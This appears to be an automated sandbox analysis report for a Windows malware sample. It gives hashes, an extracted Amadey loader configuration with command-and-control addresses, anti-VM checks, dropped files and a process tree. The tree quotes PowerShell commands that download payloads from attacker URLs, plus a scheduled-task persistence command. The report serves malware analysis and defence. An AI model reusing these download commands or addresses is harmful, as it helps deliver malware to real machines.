Analysis
-
max time kernel
143s -
max time network
133s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-05-2024 16:25
Static task
static1
Behavioral task
behavioral1
Sample
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Resource
win10v2004-20240226-en
General
-
Target
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
-
Size
1.8MB
-
MD5
a41ed1469e0fc7bb00ffba36cf6fb862
-
SHA1
3479ae464278d392aa4555524ad7a40a5a3c2df2
-
SHA256
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31
-
SHA512
9ad1009e85efef1277fafc774f36fa71be1bad4d4bebc2944a59db076592f040427fd1edcaef653159d8b9d07461ca19b4fdc1e8dbd2964980972a5c503ef21d
-
SSDEEP
49152:6O95X9+LbTNyR9nuU9UdwaxwgNtA6erpkJayQfw6x:DFOTIRzULwgodQgfLx
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
axplons.exeaxplons.exefd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 24 2148 powershell.exe 25 4616 powershell.exe 26 4616 powershell.exe 28 2192 powershell.exe 29 2192 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplons.exeaxplons.exefd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe -
Executes dropped EXE 11 IoCs
Processes:
axplons.exeNewoff.exetoolspub1.exelumma1234.exevpn-1002.exei0.exei0.tmpaxplons.exeNewoff.exeNewoff.exeaxplons.exepid process 4560 axplons.exe 4992 Newoff.exe 1412 toolspub1.exe 836 lumma1234.exe 232 vpn-1002.exe 4872 i0.exe 764 i0.tmp 4808 axplons.exe 3164 Newoff.exe 2564 Newoff.exe 2824 axplons.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exeaxplons.exeaxplons.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine axplons.exe -
Loads dropped DLL 1 IoCs
Processes:
vpn-1002.exepid process 232 vpn-1002.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 30 checkip.amazonaws.com 4 checkip.amazonaws.com -
Drops file in System32 directory 1 IoCs
Processes:
i0.tmpdescription ioc process File created C:\Windows\system32\shlwapi_p.dll i0.tmp -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exeaxplons.exeaxplons.exepid process 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe 4560 axplons.exe 4808 axplons.exe 2824 axplons.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lumma1234.exedescription pid process target process PID 836 set thread context of 2384 836 lumma1234.exe RegAsm.exe -
Drops file in Program Files directory 14 IoCs
Processes:
i0.tmpdescription ioc process File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx i0.tmp File opened for modification C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml i0.tmp File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp File created C:\Program Files\Online Security\is-UG4QN.tmp i0.tmp -
Drops file in Windows directory 3 IoCs
Processes:
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exechrome.exedescription ioc process File created C:\Windows\Tasks\axplons.job fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\SystemTemp\scoped_dir2656_128953709\extension.zip chrome.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 2148 powershell.exe 4616 powershell.exe 2192 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5040 1412 WerFault.exe toolspub1.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
toolspub1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1268 taskkill.exe 1696 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exepowershell.exepowershell.exepowershell.exeaxplons.exeaxplons.exepid process 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe 4560 axplons.exe 4560 axplons.exe 2148 powershell.exe 2148 powershell.exe 4616 powershell.exe 4616 powershell.exe 2192 powershell.exe 2192 powershell.exe 4808 axplons.exe 4808 axplons.exe 2824 axplons.exe 2824 axplons.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2148 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
i0.tmppid process 764 i0.tmp -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exeaxplons.exeNewoff.exelumma1234.exevpn-1002.execmd.exei0.exei0.tmpcmd.exechrome.exedescription pid process target process PID 2012 wrote to memory of 4560 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe axplons.exe PID 2012 wrote to memory of 4560 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe axplons.exe PID 2012 wrote to memory of 4560 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe axplons.exe PID 4560 wrote to memory of 4992 4560 axplons.exe Newoff.exe PID 4560 wrote to memory of 4992 4560 axplons.exe Newoff.exe PID 4560 wrote to memory of 4992 4560 axplons.exe Newoff.exe PID 4992 wrote to memory of 4732 4992 Newoff.exe schtasks.exe PID 4992 wrote to memory of 4732 4992 Newoff.exe schtasks.exe PID 4992 wrote to memory of 4732 4992 Newoff.exe schtasks.exe PID 4992 wrote to memory of 1412 4992 Newoff.exe toolspub1.exe PID 4992 wrote to memory of 1412 4992 Newoff.exe toolspub1.exe PID 4992 wrote to memory of 1412 4992 Newoff.exe toolspub1.exe PID 4560 wrote to memory of 836 4560 axplons.exe lumma1234.exe PID 4560 wrote to memory of 836 4560 axplons.exe lumma1234.exe PID 4560 wrote to memory of 836 4560 axplons.exe lumma1234.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 836 wrote to memory of 2384 836 lumma1234.exe RegAsm.exe PID 4992 wrote to memory of 232 4992 Newoff.exe vpn-1002.exe PID 4992 wrote to memory of 232 4992 Newoff.exe vpn-1002.exe PID 4992 wrote to memory of 232 4992 Newoff.exe vpn-1002.exe PID 232 wrote to memory of 1924 232 vpn-1002.exe cmd.exe PID 232 wrote to memory of 1924 232 vpn-1002.exe cmd.exe PID 232 wrote to memory of 1924 232 vpn-1002.exe cmd.exe PID 1924 wrote to memory of 2148 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 2148 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 2148 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 4616 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 4616 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 4616 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 4872 1924 cmd.exe i0.exe PID 1924 wrote to memory of 4872 1924 cmd.exe i0.exe PID 1924 wrote to memory of 4872 1924 cmd.exe i0.exe PID 1924 wrote to memory of 2192 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 2192 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 2192 1924 cmd.exe powershell.exe PID 4872 wrote to memory of 764 4872 i0.exe i0.tmp PID 4872 wrote to memory of 764 4872 i0.exe i0.tmp PID 4872 wrote to memory of 764 4872 i0.exe i0.tmp PID 764 wrote to memory of 4080 764 i0.tmp cmd.exe PID 764 wrote to memory of 4080 764 i0.tmp cmd.exe PID 4080 wrote to memory of 2656 4080 cmd.exe chrome.exe PID 4080 wrote to memory of 2656 4080 cmd.exe chrome.exe PID 2656 wrote to memory of 2168 2656 chrome.exe chrome.exe PID 2656 wrote to memory of 2168 2656 chrome.exe chrome.exe PID 764 wrote to memory of 1876 764 i0.tmp cmd.exe PID 764 wrote to memory of 1876 764 i0.tmp cmd.exe PID 764 wrote to memory of 3376 764 i0.tmp cmd.exe PID 764 wrote to memory of 3376 764 i0.tmp cmd.exe PID 764 wrote to memory of 1696 764 i0.tmp taskkill.exe PID 764 wrote to memory of 1696 764 i0.tmp taskkill.exe PID 764 wrote to memory of 1268 764 i0.tmp taskkill.exe PID 764 wrote to memory of 1268 764 i0.tmp taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe"C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 3845⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\abc.bat"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10006⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp" /SL5="$901AA,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10007⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""8⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx9⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff86081cc40,0x7ff86081cc4c,0x7ff86081cc5810⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\njktgx.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\wetqzt > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""8⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1412 -ip 14121⤵
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5c0636f2d138baca01dbb2eedb99bf3d5
SHA13b927899db0f3e2cb510782592887dc02fc3e400
SHA25610973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA5120187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5e50484a2db5325bb8033144393d5b216
SHA11a04ae7b55ec49730e3e53b523940e65c8b87001
SHA2566863adb5c2f87aff9b612c627b2d78ba67e8c7f650812d2a2e0abf32e0de3430
SHA5120bad2d0c0949b365458a886c2886c44a1138cfbf9cbbd5125886a7a11580dbff4c8f6f00c783f3e5994f3db437b20e33aa462facf157e03967bb03d97796c000
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD50bc9d7c2c803dec65abeed489db09e62
SHA1ace2ea73fa62ec224f84733d3359e818d448d17a
SHA2563caf550be89ecd069f886989215423a4a81231a18635cdf75fc3076ee59ebc89
SHA5129794b6adbd316ddb9081fe9142c731f8c8d378e8e36f157abeb7f5b397bf0ad838114ee8d2732e79c378e33e9e3abc315129daa731165277f4dc8347a94106b7
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeFilesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exeFilesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exeFilesize
210KB
MD510e9648c3c9c3f6985e5962cdc795f21
SHA1a23f89036f056b967dfb6d8c8632d4e3d56d2258
SHA2560d3928bbe9db17a0bd0ce3454c39362b60f26c1613cc8d488f69f81fbf2868c1
SHA5126c597f9278fce6d03d3aabaace82e2c6dd3afac291b484c525aeb264f9d6a6041d415ca60bac4569ca4dcd605c741f56757323fe3e20dc6978adb703ec158d6f
-
C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exeFilesize
49KB
MD5ccb630a81a660920182d1c74b8db7519
SHA17bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA5128fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeFilesize
1.8MB
MD5a41ed1469e0fc7bb00ffba36cf6fb862
SHA13479ae464278d392aa4555524ad7a40a5a3c2df2
SHA256fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31
SHA5129ad1009e85efef1277fafc774f36fa71be1bad4d4bebc2944a59db076592f040427fd1edcaef653159d8b9d07461ca19b4fdc1e8dbd2964980972a5c503ef21d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2kczhrn1.fsm.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\i0.exeFilesize
3.5MB
MD5b80362872ea704846e892f16aab924c3
SHA1222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5
-
C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmpFilesize
3.1MB
MD5bdf5432c7470916ab3c25f031c4c8d76
SHA14762eeae811cfad7449a3d13fb1d759932c6d764
SHA25672f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA51233ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\chrome.zipFilesize
47KB
MD552311257a997455c0a32e1679e0b614e
SHA1395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA25650a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA51219488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\dlls.manifestFilesize
208B
MD5963fb7657217be957d7d4732d892e55c
SHA1593578a69d1044a896eb8ec2da856e94d359ef6b
SHA2561d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\edge.zipFilesize
43KB
MD511a38af0ad330d95d2fb709612a44fa5
SHA1bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA2560d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA5124bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx.crxFilesize
49KB
MD52234eac6ac03f373613e4a20b8da614f
SHA1223b560ecee466f437035080038654c087ae66e8
SHA256af22ab0dc195972c3214ed26a0e85d64196d90233d0c55a3b1ff16710b376f77
SHA512c99dec5b552aba2060b9117c8b609e611de1e44d04a913202d1e3b483c7a2f3d94bd7bb7e40a634211940496a28269b53673022d0945806d96d67d961d82ee76
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx.pemFilesize
1KB
MD55cc33f291f61d765205dd6600107cb6a
SHA19d4d13ef2c98cc21c64cb3d150285f68e156e798
SHA2564d3029f3117733c9506121f0bed242bcb8a7ce09090e9f1edcba1781627e053a
SHA512cd799f8a522b1c0eff12cd9ddc5bba7d56073fcb832634487bfde1dcbd873a9937806d653d63a10dd6b31118fd76244fee28d86b287fe90dc3eada4f5ac15ace
-
C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\icons\icon-128.pngFilesize
8KB
MD5d57a101cf48bd00b5297596c081ece42
SHA147be9ca3d2a57788957bb6f91d9a6886c4252c0f
